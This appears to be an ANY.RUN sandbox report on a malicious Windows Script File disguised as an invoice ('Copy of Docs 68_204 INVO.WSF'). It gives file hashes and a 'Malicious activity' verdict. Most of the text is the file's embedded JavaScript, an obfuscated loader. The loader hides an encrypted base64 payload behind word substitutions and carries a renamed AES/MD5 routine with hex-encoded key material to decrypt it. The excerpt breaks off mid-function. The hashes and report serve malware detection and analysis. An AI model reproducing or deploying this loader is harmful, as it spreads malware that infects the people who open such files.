File name: | Copy of Docs 68_204 INVO.WSF |
Full analysis: | https://app.any.run/tasks/703e4fe7-a2f6-4e5d-b365-6b6f562daddc |
Verdict: | Malicious activity |
Analysis date: | January 18, 2020, 10:42:20 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/xml |
File info: | XML 1.0 document, ASCII text, with very long lines, with no line terminators |
MD5: | 6E67786F68931599C4667F2CFEA164B9 |
SHA1: | 9707EF2E939B8EDC87D33B0D416EDFB0F6AA70F3 |
SHA256: | 0444FF998B75D9D53A5879087BAF542415D22271801A67B9F1D5BB851620E7BB |
SSDEEP: | 384:U1R5TB/kHcTbgdM0moo8WE6JH+xxKqnDmrWA2juutIm6m4:oiHwgS0mooHEPPNZAUuu0 |
.xml | | | Generic XML (ASCII) (100) |
---|
PackageJobScriptLanguage: | JavaScript |
---|---|
PackageJobScript: | var dtEDoFVfAj={eMUXrzTNkg:function(r){var a=NKBCmUHGeG.eazSwMHLnL.bOuFgvcTJj.xrkoWLGoQF({ukAoslEzPa:NKBCmUHGeG.VmLLEtCkRa.qdaKtPbCGD.eMUXrzTNkg("hXrI6VHc1882GaQ1AuutGmhjD5uM0PJiojBtfmfm and l0o784XktSXA4ufoMIOcfhacZ6B and 43ZP2g7i9omx9jRoxkaz3 are dSBNiJzm and dGnZI2r53FQQKnVV9JrIg4y are YHpuvZj5PGIf60zbJulqkLTkXa0Pi0g7f are zxB7TadXzr5z are niyD and Jd are SSiyKH2Y8M651YAdyRQ are SS7BkvzQY are G58nkmR are dRTGI15uZRkrDGJRKQbgxzG769QTL and A3awUdbMM92WCAVsvs1wfbJSkeNQpIaRHfQ479NujDAZKphWRO1cBULK73MONz are QztuL4InpAGRoAuuQ and 7W are are JKc1AwSwWB and JsLXxscVU6I6sDdvXWEpdER3yT9rn56VPTP37UC9Cfnfp9 and MC are QhXwArcEsxD1Xciv0T are 4CO and A1Mkkz1X8ccgdphF49tmsNm5vwP and F0RDAtlxs2PiY6H48ByJL5JFxsWFrXYzvPKGnUfLBffqm8ls3ZF5eljwVMB are bdql1i4f1hKV2OHqbxUA2CX5lKknoW4KdiftLHQZj2G2VTIyICK26i8Z and PJP1nmWw and T3D1gW and q7ycOz1mkI3 and F5zzLDc5EKgm3 and WoOaSei0KmzUpta6ldqoMx are d are D9 are nxlhHEHMewhYHlIw31WBUoDceiK8s413 and ccjnnpWtY6xleiMDJf8ovDhtjJyke3a1HNQYk0V8EjmfjHf are dzdcVxCB1QtVwiRvZvlCkMbLSt38Wwl4u are CRVMePBkVTXZ5s69 are vds4LTA0Aw4oVbNGBfZVqVo4wSwGyhSBoJEPm7255WpszOJ7SHBL9wZUCcYQzmLZpCDaNPTZLWAxa12OvEq2s11GcBIY28ttIHCSLdPhXEaGZZCiqM3XqbxQFkwAo are VD are jGTPtbjiDQGL and ZOqqPqzrGQGMFMwgVP are Avh and HekAaeWy1oq13PeM4sAyPovc4EPmhWErfVLSI2c8rilBAo9YeyGDwkAORVUGGe2UlUok are 2cAtJddwiW9tzIFWUu4t3gDUSWKjBDXwAJfcdbOVYDWj and KLNaPOx are lwJuy3UY9epmM1IfHbw59iibQZUYCHrJ5uWJAXhOWEtYtcJY1tf are qKR1aHaBapaX2umb0M6IXEPH2RFMmwcnuqC4Pu4owez25O8BZw5YCyq0pJSTH and t are k9aZonogWXx160PGgxC are ZjWCTjT8w5MBYf6Q6KHDrSQXwSLWvkCO9h5LuzZ1l4hOyoQ3k4IAcZ0p2acc4 and TJpShsBKIyXRo3vHmZJgZusOKnjMp5KnRiV977EpWu5DO04U and 7zWLYVPzGNm9cfsVrjpdXz6Skh4kJZ1a2hWbsQlFudse6x9t0KBd4PGcm4yri7IthM are CjBtJRCW3d0CmYoi8zhX are vszXndxds5 and UitIjtz57cEWJeYvOD and UaO1xfj and csD77yvaVDl5Bmai and 1J4YcQHmWHp0uzJxaV9i4ynKSWfdtW are 9yfSJhXpL are DRgYoC8yxRnqjqzqWCisyEULaImc9RkGg6mmReVEj2AbCTxcTostc are gBm are gsDWmpizifhK9WvSGbI7eTCoZ and 
S5OXEU3W9V1jnEUYCk4qVP3QuxAS70YZwbovrSkn0 and XARuvNTCbHpnhCD8hw7RYq552EpZCp3rQGyVlFfxc257U7rHF0PTqMOd are 5DwPkabGT and VgW and xncxz21Cj7wVHC73vlzqvV are PI1kGlPT are HaFaFLV4qutNvtielCQkZbGuFRBAXxA1Z3A1u2tuYrpCtISB68j2TtbFbxQnzGvr are vEKW are ejhfUcZ1CsRZRAmYAWl0dcYPsp8XKAhNZWJ are gzZPAjyxcL3nriE97oNhod4aOdNbTfNUKe3CphYnsdGdbGuWj0ruWVOh5egU8GL and MNdelWRFC0PczuJ9OFKpFyYDTbuvCwTEZLXb3ltKNU9mh4AHeuZb7vO6XOfevqnEgVNcWBmwgM1JDEnb and atz96zBvtYwKVTCcDTndnKayXO and lc82uRCy4lNm6YagZ9AsgsPdq1eqBIpxIQ8juHCVivA5PHtP2tidi and S3ezdj37qnjwqOrwnVTzNvZwvl4DL3B6yeepbyqD and p7grOkWHAS7mhC and eeDv895PEt6FGMntgKvjlbwBa423LLmDv74Ix7NRcCct68SGfkChXKoYck3dMozwB8Ss3fJ2FmhaiO5GttqihfWq9NR3SRusXCAiSh5uK3okEXrtmm04ZUH8ldOTKd28EkhPvSmg7r are lBCPKt6O and k5mgs4eiqeVb0KxeFczXBCRi89CPNutFH1yK86 are H0bdXyKZoIXtbec4evOybGVqh028kw5nxrxIUcLVweByg are VN12HhUOR5cqaU0VdQRKFEZ are 7mlIAxdxywORzGlC4GLaC4ikdpMQa23 and 6vKXaZF24NqKEJ1VdKK6medjdeaqjcZkjOr7oVf4V6OocG1WIpevZMJvWX5ZsEJd94ZviwVKOvqLUocAtmBaZeO5rQM1TtLz4wG and t and vIRJkjxaja2dDQ5KyhWKlDo3TbdhZ7AT0NnZF0FPnq3RcgUvAUrzvuRuvJKBVZ6v2h are b21OGY and yLWLxIi9Ka5S9oOt and and dkZQZmNcoFM4BuGaPS3efXa6PEGd0jGjZKF5TDOMO1dePbDtoGkdy8Z6tfzuGIC3SH9hl7EbcTSAkvns7d3jcru8 and igPxkapNqIr2s7Qv3Qt8hpJeMBwx1ILC1I are rC7fjBR1wYv7lsBJov8kL03A5jDoyZvEouf2V and fzHMLXmAuGb and R6MnuyUUBOppM36jESTcfPNYjx and NlidUMIn8ijozFytVfkt4wAsq90MbAlcso2y9D are EpiArc2N708N14qL5 are pPRCJb6UpRUJn1MI38DE1hjgzWlIeyvcPwvTWbqGubBJP6DIQJ9Avy are nvijYBfPAuXIkH4IS and 0yPyFcdt are fswfPqt2E4DKqhCm5kNVMF4BThsNauwzeSS2lxEr and PWu7MvY9M3wuGvj3EW0yZq5CM3Gm6R7gl9 are bST are IyhGwDM4bqFN0bqGgeqlgJzQqFFPA and wnQ1Km0EFUYW0biVj4anSrDd3JWtJ are and NZcCeL5MXfHX8lBEQLquksAq and fBxCBoGht11mZN4sJX5o9CTROWZLgH67WxukBYJeykngNcO1rpRSFsJ5w2Zw5GK8nfLKF3tdzig3X7HMPdbgx75azouagQmGcHaE are QItF0z2JYxfOjdhQPmElhBsdXtTxfplPb8Cts02gafq7KExoSPK991ca1LVwKnqY8hSRL7Ox are EmO2c1epWsKEoj6DcA are 3jZ0GOmDRGSWZLXJWu4ytMXc5itOKFpfwzUlGuHKdDx are 
YDfz3gDfhgp3jYZlatnlzYtvm1DTw43dLHx2UAxm8CCE1Ek1vUExdKtjQrIM2BWjjzd0Mw81CxLr4zjsGjv4axtCU22jWCM1PfWPygVzx02zxEewGzmz7E0qbeQm6CQrn337r279rPhBYd0i1uX1ewzKJOEuETA3pPBIw2gJyHneZ3qSUOydPRCDtQ3E59idpW and XYO9LskAb8GIRBfRfFCmxrn1yTODUyoNiFE01 are MiFbaXzmJlQxHwmhE9UbAMx are BNF0c1yEPphQu39labdWbf5WoswYtqvwOQlEUxugSXDIh3McCOgD3hALEgrJZ9nrM01oOxnw88cA31LZpkmeDjYCMR and XOzWLRQ6fXReP and wZ4u are and ps7GYfltz2kiEmfq2zzg2bNsH and Mwa7tnyNrKK9Pqc are bsQyqg3H3AAEB6AtGfk1 are vnI3dDrlxEI89T3fgpH4cEmym0rEFPSF77bNk9 are yjNRoc0PlD8Y28T8sxkYhmOMVPm5BgVk6hYKYkhARJYNJ0mGGwOdDsqJ1 and P8CyHDuRehNfZWsGzG and Eqr8Hy4fZMfqt are jUr7lyxbEfVpbJFVLgrOZbnec are hZ and adj6XSZs3Lupb7bTcZYTlfL8yD6SBSUD1mf8ILWoZz7Wl and MCPLMzsHuK4C5sV1IYWES76atP5dzfbREIMPZc6ZBce3Eud4MQdxuZ789BVn0q5YCfLybs are p0sDE31PLbROC25LBlIZaJGNacqL9A0Nb2iyEWTmwrxclBOrMwMnISCh2WVQ3foO4q1mRqQ0l6HrhYLe5oVnqb7aVTt7jNWHYbgqAgNdG6mrACztTrNzonc65poVjP5mj7B4vmLT are qZinSukistDRUngoi4eGrVRKOxlB92jJjeRBw14btD1WM are Xl0u3wsVONebFdGBJ6Chro60Ynoc are BarDNsIPtNiP4MJE0TsxINOpoI9ZYbgjgI2PfDsrPyEibFAQxRnWrR7EIeb and Le5S45ic948npMHeHwbVC7ZIogPSRYm are 5o0crU5Zg2EK2XzN5NzfjWyKOvzzaGwqMGJjo5GkpuhGpHjR0zuaXW are 6A3J3tUKDSG9 are 2 and 870Ycg9ghgVBgWCJBFYuAN74BJgZEVk4Db3jUUhz4vEkyCIR6dEjaCXpNa1kugicsogD4U2Qu49SnrsAUKbpyshyBIm6kc2r4dU4SxQAwFBuRinrqUMbgYFAm8leGfi6O3StOy84czlNpyGxzQByMLwYIRhp6tb0OY9oBbdOQS and 8i4G and v70kkWCBDqRsmBFIz4iVe5HcwAaabiU6Fl8RKlJvGUfiv3zStwFqXvctpcq63cfgCbYpQJuU and eoTTdl and DuKNrQkm9zD0zxBpB18eLeQnIKA are and tFmMIiID6JPtEeJQPlfcIj5z1CvBS794ssrrTng97G and BYMQMF5Atblixch9pQPNxyVKqBt4q8TPEZo and YXwN7M6L70O8UarPXLue8JurQ7U9ccn5 and pZT and 2rx6tdVG0oqo1zhAfVexenrWasd9hhPnTyKEbc1TDXVboJCs5VbRxbOTIO45UDtz are 97 and Fs95mp9OwL6wTebE0P8 and L2vVnjWftpBmNIc1pFZGNrAgBmAZL7qpayzF6sS34rqJenJnyVigYTcgbbqMtjs1TZWzIsoniMXuCBs9sH2R5YE0O8B0t8zEu27hmF are BdgTEWs3ufga2PmeuGZBJvt1pPVjdkHUZ56TiRBjTzhic are Mv5WmwjBogQ4Gi and kRCYULmBRnZ and aSSXbXA9T9B0NfgU2VFMJWbFFAwhonZL9J34K0btsmR are Seuv8 and 
I3J6oxsfyH3gX09fyaVzzktwVqUJWe4jesChFC5youtY6X and 7AHeHm87dHdWzVGJb52Kn2q1qi2jRQv74ggK84jfvd0batVJEIvwAyYnE0tWMdlgZj and 8HH3 and ziJOq4pYG".replace(/\sand\s/g,"+").replace(/\sare\s/g,"/"))});return a.yLIlTYUEdC=NKBCmUHGeG.VmLLEtCkRa.lDGQhhAcvH.eMUXrzTNkg("\x35\x36\x33\x66\x64\x62\x35\x37\x66\x65\x62\x61\x30\x38\x33\x39\x31\x37\x35\x65\x65\x31\x65\x62\x62\x33\x33\x64\x63\x34\x62\x65"),a.gwiUkDQFxZ=NKBCmUHGeG.VmLLEtCkRa.lDGQhhAcvH.eMUXrzTNkg("\x36\x30\x34\x37\x61\x37\x62\x38\x65\x32\x30\x66\x39\x37\x30\x37"),a}},NKBCmUHGeG=NKBCmUHGeG||function(s){function v(){}var r={},a=r.eazSwMHLnL={},t=a.PWMbKrXNBt={LBLCJIeRxa:function(r){v.prototype=this;var a=new v;return r&&a.GYRmHplwNA(r),a.hasOwnProperty("VTADyRvtZq")||(a.VTADyRvtZq=function(){a.$super.VTADyRvtZq.apply(this,arguments)}),(a.VTADyRvtZq.prototype=a).$super=this,a},xrkoWLGoQF:function(){var r=this.LBLCJIeRxa();return r.VTADyRvtZq.apply(r,arguments),r},VTADyRvtZq:function(){},GYRmHplwNA:function(r){for(var a in r)r.hasOwnProperty(a)&&(this[a]=r[a]);r.hasOwnProperty("toString")&&(this.toString=r.toString)},CUrjqyrzhF:function(){return this.VTADyRvtZq.prototype.LBLCJIeRxa(this)}},u=a.KVwhYRmAAZ=t.LBLCJIeRxa({VTADyRvtZq:function(r,a){r=this.eZRNeHSVmZ=r||[],this.KlwuiHJXBf=null!=a?a:4*r.length},toString:function(r){return(r||i).BmCiUFCvRY(this)},SYgJPZTcjh:function(r){var a=this.eZRNeHSVmZ,v=r.eZRNeHSVmZ,t=this.KlwuiHJXBf;if(r=r.KlwuiHJXBf,this.PFqgzhjvEl(),t%4)for(var n=0;n<r;n++)a[t+n>>>2]|=(v[n>>>2]>>>24-n%4*8&255)<<24-(t+n)%4*8;else if(65535<v.length)for(n=0;n<r;n+=4)a[t+n>>>2]=v[n>>>2];else a.push.apply(a,v);return this.KlwuiHJXBf+=r,this},PFqgzhjvEl:function(){var r=this.eZRNeHSVmZ,a=this.KlwuiHJXBf;r[a>>>2]&=4294967295<<32-a%4*8,r.length=s.ceil(a/4)},CUrjqyrzhF:function(){var r=t.CUrjqyrzhF.call(this);return r.eZRNeHSVmZ=this.eZRNeHSVmZ.slice(0),r},CqlccWGqHP:function(r){for(var a=[],v=0;v<r;v+=4)a.push(4294967296*s.CqlccWGqHP()|0);return new 
u.VTADyRvtZq(a,r)}}),n=r.VmLLEtCkRa={},i=n.lDGQhhAcvH={BmCiUFCvRY:function(r){var a=r.eZRNeHSVmZ;r=r.KlwuiHJXBf;for(var v=[],t=0;t<r;t++){var n=a[t>>>2]>>>24-t%4*8&255;v.push((n>>>4).toString(16)),v.push((15&n).toString(16))}return v.join("")},eMUXrzTNkg:function(r){for(var a=r.length,v=[],t=0;t<a;t+=2)v[t>>>3]|=parseInt(r.substr(t,2),16)<<24-t%8*4;return new u.VTADyRvtZq(v,a/2)}},o=n.WfDUQhNjUK={BmCiUFCvRY:function(r){var a=r.eZRNeHSVmZ;r=r.KlwuiHJXBf;for(var v=[],t=0;t<r;t++)v.push(String.fromCharCode(a[t>>>2]>>>24-t%4*8&255));return v.join("")},eMUXrzTNkg:function(r){for(var a=r.length,v=[],t=0;t<a;t++)v[t>>>2]|=(255&r.charCodeAt(t))<<24-t%4*8;return new u.VTADyRvtZq(v,a)}},h=n.IBEHHawlRa={BmCiUFCvRY:function(r){try{return decodeURIComponent(escape(o.BmCiUFCvRY(r)))}catch(r){throw Error("Malformed UTF-8 data")}},eMUXrzTNkg:function(r){return o.eMUXrzTNkg(unescape(encodeURIComponent(r)))}},e=a.UlEVySMEJs=t.LBLCJIeRxa({FHfjEzPpJw:function(){this.vIeNauyfgj=new u.VTADyRvtZq,this.GESeKdKkDW=0},gyZqefjfbb:function(r){"string"==typeof r&&(r=h.eMUXrzTNkg(r)),this.vIeNauyfgj.SYgJPZTcjh(r),this.GESeKdKkDW+=r.KlwuiHJXBf},RKIgZniAQd:function(r){var a=this.vIeNauyfgj,v=a.eZRNeHSVmZ,t=a.KlwuiHJXBf,n=this.xWmTEJzxuk,i=t/(4*n);if(r=(i=r?s.ceil(i):s.max((0|i)-this.jreIRpNpkc,0))*n,t=s.min(4*r,t),r){for(var o=0;o<r;o+=n)this.UhGEEtisBv(v,o);o=v.splice(0,r),a.KlwuiHJXBf-=t}return new u.VTADyRvtZq(o,t)},CUrjqyrzhF:function(){var r=t.CUrjqyrzhF.call(this);return r.vIeNauyfgj=this.vIeNauyfgj.CUrjqyrzhF(),r},jreIRpNpkc:0});a.bNRyvxysqf=e.LBLCJIeRxa({tAjRFOtDJa:t.LBLCJIeRxa(),VTADyRvtZq:function(r){this.tAjRFOtDJa=this.tAjRFOtDJa.LBLCJIeRxa(r),this.FHfjEzPpJw()},FHfjEzPpJw:function(){e.FHfjEzPpJw.call(this),this.VDrUSIMlYF()},xizcXRaCSF:function(r){return this.gyZqefjfbb(r),this.RKIgZniAQd(),this},fZuooDWaQu:function(r){return r&&this.gyZqefjfbb(r),this.jnfmItvFqw()},xWmTEJzxuk:16,bvTMfLRMFS:function(v){return function(r,a){return new 
v.VTADyRvtZq(a).fZuooDWaQu(r)}},FdkaCDLqCX:function(v){return function(r,a){return new c.HMAC.VTADyRvtZq(v,a).fZuooDWaQu(r)}}});var c=r.RfuCsvEMIV={};return r}(Math);!function(){var r=NKBCmUHGeG,u=r.eazSwMHLnL.KVwhYRmAAZ;r.VmLLEtCkRa.qdaKtPbCGD={BmCiUFCvRY:function(r){var a=r.eZRNeHSVmZ,v=r.KlwuiHJXBf,t=this.KraWJNWdbF;r.PFqgzhjvEl(),r=[];for(var n=0;n<v;n+=3)for(var i=(a[n>>>2]>>>24-n%4*8&255)<<16|(a[n+1>>>2]>>>24-(n+1)%4*8&255)<<8|a[n+2>>>2]>>>24-(n+2)%4*8&255,o=0;o<4&&n+.75*o<v;o++)r.push(t.charAt(i>>>6*(3-o)&63));if(a=t.charAt(64))for(;r.length%4;)r.push(a);return r.join("")},eMUXrzTNkg:function(r){var a=r.length,v=this.KraWJNWdbF;!(t=v.charAt(64))||-1!=(t=r.indexOf(t))&&(a=t);for(var t=[],n=0,i=0;i<a;i++)if(i%4){var o=v.indexOf(r.charAt(i-1))<<i%4*2,s=v.indexOf(r.charAt(i))>>>6-i%4*2;t[n>>>2]|=(o|s)<<24-n%4*8,n++}return u.xrkoWLGoQF(t,n)},KraWJNWdbF:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="}}(),function(i){function m(r,a,v,t,n,i,o){return((r=r+(a&v|~a&t)+n+o)<<i|r>>>32-i)+a}function A(r,a,v,t,n,i,o){return((r=r+(a&t|v&~t)+n+o)<<i|r>>>32-i)+a}function C(r,a,v,t,n,i,o){return((r=r+(a^v^t)+n+o)<<i|r>>>32-i)+a}function O(r,a,v,t,n,i,o){return((r=r+(v^(a|~t))+n+o)<<i|r>>>32-i)+a}for(var r=NKBCmUHGeG,a=(t=r.eazSwMHLnL).KVwhYRmAAZ,v=t.bNRyvxysqf,t=r.RfuCsvEMIV,M=[],n=0;n<64;n++)M[n]=4294967296*i.abs(i.sin(n+1))|0;t=t.lLteiQqIHF=v.LBLCJIeRxa({VDrUSIMlYF:function(){this.eSduUVnIBD=new a.VTADyRvtZq([1732584193,4023233417,2562383102,271733878])},UhGEEtisBv:function(r,a){for(var v=0;v<16;v++){var t=r[o=a+v];r[o]=16711935&(t<<8|t>>>24)|4278255360&(t<<24|t>>>8)}v=this.eSduUVnIBD.eZRNeHSVmZ;var 
n,i,o=r[a+0],s=(t=r[a+1],r[a+2]),u=r[a+3],h=r[a+4],e=r[a+5],c=r[a+6],f=r[a+7],l=r[a+8],p=r[a+9],g=r[a+10],d=r[a+11],k=r[a+12],y=r[a+13],w=r[a+14],S=r[a+15],_=v[0],B=O(B=O(B=O(B=O(B=C(B=C(B=C(B=C(B=A(B=A(B=A(B=A(B=m(B=m(B=m(B=m(B=v[1],i=m(i=v[2],n=m(n=v[3],_=m(_,B,i,n,o,7,M[0]),B,i,t,12,M[1]),_,B,s,17,M[2]),n,_,u,22,M[3]),i=m(i,n=m(n,_=m(_,B,i,n,h,7,M[4]),B,i,e,12,M[5]),_,B,c,17,M[6]),n,_,f,22,M[7]),i=m(i,n=m(n,_=m(_,B,i,n,l,7,M[8]),B,i,p,12,M[9]),_,B,g,17,M[10]),n,_,d,22,M[11]),i=m(i,n=m(n,_=m(_,B,i,n,k,7,M[12]),B,i,y,12,M[13]),_,B,w,17,M[14]),n,_,S,22,M[15]),i=A(i,n=A(n,_=A(_,B,i,n,t,5,M[16]),B,i,c,9,M[17]),_,B,d,14,M[18]),n,_,o,20,M[19]),i=A(i,n=A(n,_=A(_,B,i,n,e,5,M[20]),B,i,g,9,M[21]),_,B,S,14,M[22]),n,_,h,20,M[23]),i=A(i,n=A(n,_=A(_,B,i,n,p,5,M[24]),B,i,w,9,M[25]),_,B,u,14,M[26]),n,_,l,20,M[27]),i=A(i,n=A(n,_=A(_,B,i,n,y,5,M[28]),B,i,s,9,M[29]),_,B,f,14,M[30]),n,_,k,20,M[31]),i=C(i,n=C(n,_=C(_,B,i,n,e,4,M[32]),B,i,l,11,M[33]),_,B,d,16,M[34]),n,_,w,23,M[35]),i=C(i,n=C(n,_=C(_,B,i,n,t,4,M[36]),B,i,h,11,M[37]),_,B,f,16,M[38]),n,_,g,23,M[39]),i=C(i,n=C(n,_=C(_,B,i,n,y,4,M[40]),B,i,o,11,M[41]),_,B,u,16,M[42]),n,_,c,23,M[43]),i=C(i,n=C(n,_=C(_,B,i,n,p,4,M[44]),B,i,k,11,M[45]),_,B,S,16,M[46]),n,_,s,23,M[47]),i=O(i,n=O(n,_=O(_,B,i,n,o,6,M[48]),B,i,f,10,M[49]),_,B,w,15,M[50]),n,_,e,21,M[51]),i=O(i,n=O(n,_=O(_,B,i,n,k,6,M[52]),B,i,u,10,M[53]),_,B,g,15,M[54]),n,_,t,21,M[55]),i=O(i,n=O(n,_=O(_,B,i,n,l,6,M[56]),B,i,S,10,M[57]),_,B,c,15,M[58]),n,_,y,21,M[59]),i=O(i,n=O(n,_=O(_,B,i,n,h,6,M[60]),B,i,d,10,M[61]),_,B,s,15,M[62]),n,_,p,21,M[63]);v[0]=v[0]+_|0,v[1]=v[1]+B|0,v[2]=v[2]+i|0,v[3]=v[3]+n|0},jnfmItvFqw:function(){var r=this.vIeNauyfgj,a=r.eZRNeHSVmZ,v=8*this.GESeKdKkDW,t=8*r.KlwuiHJXBf;a[t>>>5]|=128<<24-t%32;var 
n=i.floor(v/4294967296);for(a[15+(t+64>>>9<<4)]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8),a[14+(t+64>>>9<<4)]=16711935&(v<<8|v>>>24)|4278255360&(v<<24|v>>>8),r.KlwuiHJXBf=4*(a.length+1),this.RKIgZniAQd(),a=(r=this.eSduUVnIBD).eZRNeHSVmZ,v=0;v<4;v++)t=a[v],a[v]=16711935&(t<<8|t>>>24)|4278255360&(t<<24|t>>>8);return r},CUrjqyrzhF:function(){var r=v.CUrjqyrzhF.call(this);return r.eSduUVnIBD=this.eSduUVnIBD.CUrjqyrzhF(),r}}),r.lLteiQqIHF=v.bvTMfLRMFS(t),r.HmaclLteiQqIHF=v.FdkaCDLqCX(t)}(Math),function(){var r,a=NKBCmUHGeG,v=(r=a.eazSwMHLnL).PWMbKrXNBt,h=r.KVwhYRmAAZ,t=(r=a.RfuCsvEMIV).clGbCUkVRF=v.LBLCJIeRxa({tAjRFOtDJa:v.LBLCJIeRxa({KzfiCbrnue:4,qwYZePKuGS:r.lLteiQqIHF,qqfapNqQKP:1}),VTADyRvtZq:function(r){this.tAjRFOtDJa=this.tAjRFOtDJa.LBLCJIeRxa(r)},IOaZMzuUuc:function(r,a){for(var v=(o=this.tAjRFOtDJa).qwYZePKuGS.xrkoWLGoQF(),t=h.xrkoWLGoQF(),n=t.eZRNeHSVmZ,i=o.KzfiCbrnue,o=o.qqfapNqQKP;n.length<i;){s&&v.xizcXRaCSF(s);var s=v.xizcXRaCSF(r).fZuooDWaQu(a);v.FHfjEzPpJw();for(var u=1;u<o;u++)s=v.fZuooDWaQu(s),v.FHfjEzPpJw();t.SYgJPZTcjh(s)}return t.KlwuiHJXBf=4*i,t}});a.clGbCUkVRF=function(r,a,v){return t.xrkoWLGoQF(v).IOaZMzuUuc(r,a)}}(),NKBCmUHGeG.eazSwMHLnL.SQaxnzYskL||function(){var r=(f=NKBCmUHGeG).eazSwMHLnL,a=r.PWMbKrXNBt,o=r.KVwhYRmAAZ,v=r.UlEVySMEJs,t=f.VmLLEtCkRa.qdaKtPbCGD,n=f.RfuCsvEMIV.clGbCUkVRF,i=r.SQaxnzYskL=v.LBLCJIeRxa({tAjRFOtDJa:a.LBLCJIeRxa(),DFaQKSSpxd:function(r,a){return this.xrkoWLGoQF(this.XNQsMuyROa,r,a)},YTPIvGNUof:function(r,a){return this.xrkoWLGoQF(this.puxhpNLqoe,r,a)},VTADyRvtZq:function(r,a,v){this.tAjRFOtDJa=this.tAjRFOtDJa.LBLCJIeRxa(v),this.hLGIpQMIyO=r,this.ujgXpnylwb=a,this.FHfjEzPpJw()},FHfjEzPpJw:function(){v.FHfjEzPpJw.call(this),this.VDrUSIMlYF()},BirFVFlKOB:function(r){return this.gyZqefjfbb(r),this.RKIgZniAQd()},fZuooDWaQu:function(r){return r&&this.gyZqefjfbb(r),this.jnfmItvFqw()},KzfiCbrnue:4,XRkvWggaQX:4,XNQsMuyROa:1,puxhpNLqoe:2,bvTMfLRMFS:function(t){return{PYbsXnmtJA:function(r,a,v){return("string"==typeof 
a?l:c).PYbsXnmtJA(t,r,a,v)},IXjSHElPSb:function(r,a,v){return("string"==typeof a?l:c).IXjSHElPSb(t,r,a,v)}}}});r.StreamSQaxnzYskL=i.LBLCJIeRxa({jnfmItvFqw:function(){return this.RKIgZniAQd(!0)},xWmTEJzxuk:1});function s(r,a,v){var t=this.bQaMMvenyc;t?this.bQaMMvenyc=void 0:t=this.MAJkuGovvM;for(var n=0;n<v;n++)r[a+n]^=t[n]}var u=f.jspwHIXzmY={},h=(r.BlockSQaxnzYskLMode=a.LBLCJIeRxa({DFaQKSSpxd:function(r,a){return this.vEQkSvUxdn.xrkoWLGoQF(r,a)},YTPIvGNUof:function(r,a){return this.PtyIomnbVQ.xrkoWLGoQF(r,a)},VTADyRvtZq:function(r,a){this.GITGGidlRh=r,this.bQaMMvenyc=a}})).LBLCJIeRxa();h.vEQkSvUxdn=h.LBLCJIeRxa({BirFVFlKOBBlock:function(r,a){var v=this.GITGGidlRh,t=v.xWmTEJzxuk;s.call(this,r,a,t),v.PYbsXnmtJABlock(r,a),this.MAJkuGovvM=r.slice(a,a+t)}}),h.PtyIomnbVQ=h.LBLCJIeRxa({BirFVFlKOBBlock:function(r,a){var v=this.GITGGidlRh,t=v.xWmTEJzxuk,n=r.slice(a,a+t);v.IXjSHElPSbBlock(r,a),s.call(this,r,a,t),this.MAJkuGovvM=n}}),u=u.HoghRMehux=h,h=(f.DNsMXJjxnO={}).Pkcs7={DNsMXJjxnO:function(r,a){for(var v,t=(v=(v=4*a)-r.KlwuiHJXBf%v)<<24|v<<16|v<<8|v,n=[],i=0;i<v;i+=4)n.push(t);v=o.xrkoWLGoQF(n,v),r.SYgJPZTcjh(v)},unDNsMXJjxnO:function(r){r.KlwuiHJXBf-=255&r.eZRNeHSVmZ[r.KlwuiHJXBf-1>>>2]}},r.BlockSQaxnzYskL=i.LBLCJIeRxa({tAjRFOtDJa:i.tAjRFOtDJa.LBLCJIeRxa({jspwHIXzmY:u,ovnGHahhRt:h}),FHfjEzPpJw:function(){i.FHfjEzPpJw.call(this);var r=(a=this.tAjRFOtDJa).yLIlTYUEdC,a=a.jspwHIXzmY;if(this.hLGIpQMIyO==this.XNQsMuyROa)var v=a.DFaQKSSpxd;else v=a.YTPIvGNUof,this.jreIRpNpkc=1;this._jspwHIXzmY=v.call(a,this,r&&r.eZRNeHSVmZ)},UhGEEtisBv:function(r,a){this._jspwHIXzmY.BirFVFlKOBBlock(r,a)},jnfmItvFqw:function(){var r=this.tAjRFOtDJa.ovnGHahhRt;if(this.hLGIpQMIyO==this.XNQsMuyROa){r.DNsMXJjxnO(this.vIeNauyfgj,this.xWmTEJzxuk);var a=this.RKIgZniAQd(!0)}else a=this.RKIgZniAQd(!0),r.unDNsMXJjxnO(a);return a},xWmTEJzxuk:4});var 
e=r.bOuFgvcTJj=a.LBLCJIeRxa({VTADyRvtZq:function(r){this.GYRmHplwNA(r)},toString:function(r){return(r||this.HCvDohrvxQ).BmCiUFCvRY(this)}}),c=(u=(f.XCoXBEMuLA={}).pMgBTzEVtE={BmCiUFCvRY:function(r){var a=r.ukAoslEzPa;return((r=r.gwiUkDQFxZ)?o.xrkoWLGoQF([1398893684,1701076831]).SYgJPZTcjh(r).SYgJPZTcjh(a):a).toString(t)},eMUXrzTNkg:function(r){var a=(r=t.eMUXrzTNkg(r)).eZRNeHSVmZ;if(1398893684==a[0]&&1701076831==a[1]){var v=o.xrkoWLGoQF(a.slice(2,4));a.splice(0,4),r.KlwuiHJXBf-=16}return e.xrkoWLGoQF({ukAoslEzPa:r,salt:v})}},r.SerializableSQaxnzYskL=a.LBLCJIeRxa({tAjRFOtDJa:a.LBLCJIeRxa({XCoXBEMuLA:u}),PYbsXnmtJA:function(r,a,v,t){t=this.tAjRFOtDJa.LBLCJIeRxa(t);var n=r.DFaQKSSpxd(v,t);return a=n.fZuooDWaQu(a),n=n.tAjRFOtDJa,e.xrkoWLGoQF({ukAoslEzPa:a,key:v,yLIlTYUEdC:n.yLIlTYUEdC,RfuCsvEMIVrithm:r,jspwHIXzmY:n.jspwHIXzmY,ovnGHahhRt:n.ovnGHahhRt,xWmTEJzxuk:r.xWmTEJzxuk,HCvDohrvxQ:t.XCoXBEMuLA})},IXjSHElPSb:function(r,a,v,t){return t=this.tAjRFOtDJa.LBLCJIeRxa(t),a=this._eMUXrzTNkg(a,t.XCoXBEMuLA),r.YTPIvGNUof(v,t).fZuooDWaQu(a.ukAoslEzPa)},_eMUXrzTNkg:function(r,a){return"string"==typeof r?a.eMUXrzTNkg(r,this):r}})),f=(f.kdf={}).pMgBTzEVtE={mxqauHfFCq:function(r,a,v,t){return 